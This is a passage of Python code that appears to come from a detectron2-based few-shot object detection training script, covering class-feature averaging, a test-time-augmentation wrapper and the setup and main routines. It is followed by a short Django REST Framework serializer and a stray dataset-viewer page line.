proposals, proposal_losses = self.proposal_generator(images, features, gt_instances)
proposals = self.roi_heads.label_and_sample_proposals(proposals, gt_instances)
# Average box deatures here
gt_as_proposals = append_gt_as_proposal(gt_instances)
losses, box_features = self.roi_heads._forward_box(features, gt_as_proposals, gt_instances, return_box_features=True)
box_features_idx = 0
for instances in gt_as_proposals:
for gt_class in instances.gt_classes:
category_id = gt_class.item()
activation = box_features[box_features_idx]
class_activations[category_id].append(activation.detach().cpu())
box_features_idx += 1
for category_id in class_activations:
class_activations[category_id] = torch.stack(class_activations[category_id])
class_means[category_id] = class_activations[category_id].mean(dim=0)
print('Category: #{}, shape: {}'.format(category_id, class_activations[category_id].size()))
pass
class MyGeneralizedRCNNWithTTA(GeneralizedRCNNWithTTA):
def __init__(self, cfg, model, tta_mapper=None, batch_size=3):
"""
Args:
cfg (CfgNode):
model (GeneralizedRCNN): a GeneralizedRCNN to apply TTA on.
tta_mapper (callable): takes a dataset dict and returns a list of
augmented versions of the dataset dict. Defaults to
`DatasetMapperTTA(cfg)`.
batch_size (int): batch the augmented images into this batch size for inference.
"""
super().__init__(cfg, model, tta_mapper, batch_size)
if isinstance(model, DistributedDataParallel):
model = model.module
assert isinstance(
model, GeneralizedRCNN
), "TTA is only supported on GeneralizedRCNN. Got a model of type {}".format(type(model))
self.cfg = cfg.clone()
assert not self.cfg.MODEL.KEYPOINT_ON, "TTA for keypoint is not supported yet"
assert (
not self.cfg.MODEL.LOAD_PROPOSALS
), "TTA for pre-computed proposals is not supported yet"
self.model = model
if tta_mapper is None:
tta_mapper = DatasetMapperTTA(cfg)
self.tta_mapper = tta_mapper
self.batch_size = batch_size
def _merge_detections(self, all_boxes, all_scores, all_classes, shape_hw):
# select from the union of all results
num_boxes = len(all_boxes)
num_classes = self.cfg.MODEL.ROI_HEADS.NUM_CLASSES
# +1 because fast_rcnn_inference expects background scores as well
all_scores_2d = torch.zeros(num_boxes, num_classes + 1, device=all_boxes.device)
for idx, cls, score in zip(count(), all_classes, all_scores):
all_scores_2d[idx, cls] = score
merged_instances, _ = fast_rcnn_inference_single_image(
all_boxes,
all_scores_2d,
shape_hw,
self.cfg.MODEL.ROI_HEADS.TTA_SCORE_THRESH_TEST,
self.cfg.MODEL.ROI_HEADS.TTA_NMS_THRESH_TEST,
self.cfg.TEST.DETECTIONS_PER_IMAGE,
self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_ENABLED,
self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_METHOD,
self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_SIGMA,
self.cfg.MODEL.ROI_HEADS.TTA_SOFT_NMS_PRUNE,
)
return merged_instances
def setup(args):
"""
Create configs and perform basic setups.
"""
cfg = get_cfg()
add_troi_config(cfg)
add_fcos_config(cfg)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
default_setup(cfg, args)
return cfg
def main(args):
cfg = setup(args)
os.environ['PYTHONHASHSEED'] = str(cfg.SEED)
torch.manual_seed(cfg.SEED)
torch.cuda.manual_seed_all(cfg.SEED)
torch.backends.cudnn.deterministic = True
print("Random Seed:", cfg.SEED)
if args.eval_only:
model = Trainer.build_model(cfg)
AdetCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(
cfg.MODEL.WEIGHTS, resume=args.resume
)
res = Trainer.test(cfg, model)
if cfg.TEST.AUG.ENABLED:
res.update(Trainer.test_with_TTA(cfg, model))
return res
# if cfg.MODEL.WEIGHTS.startswith("detectron2://ImageNetPretrained"):
trainer = Trainer(cfg)
trainer.resume_or_load(resume=args.resume)
# Few-shot: reset parameters (if not resuming)
if cfg.MODEL.REINITIALIZE_BOX_PREDICTOR:
assert args.resume == False, "few-shot does not support resuming"
print('Reinitializing output box predictor')
trainer.model.roi_heads.box_predictor.cls_score.reset_parameters()
trainer.model.roi_heads.box_predictor.bbox_pred.layers[-1].reset_parameters()
# Few-shot: initialize cls_score weights to average of support set
trainer.initialize_from_support()
return trainer.train()
if __name__ == "__main__":
args = default_argument_parser().parse_args()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
|
from rest_framework import serializers
from frontend.models import Frontend
class FrontendSerializer(serializers.ModelSerializer):
class Meta:
model = Frontend
fields = ('title' , 'email','message')
# fields = '__all__'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.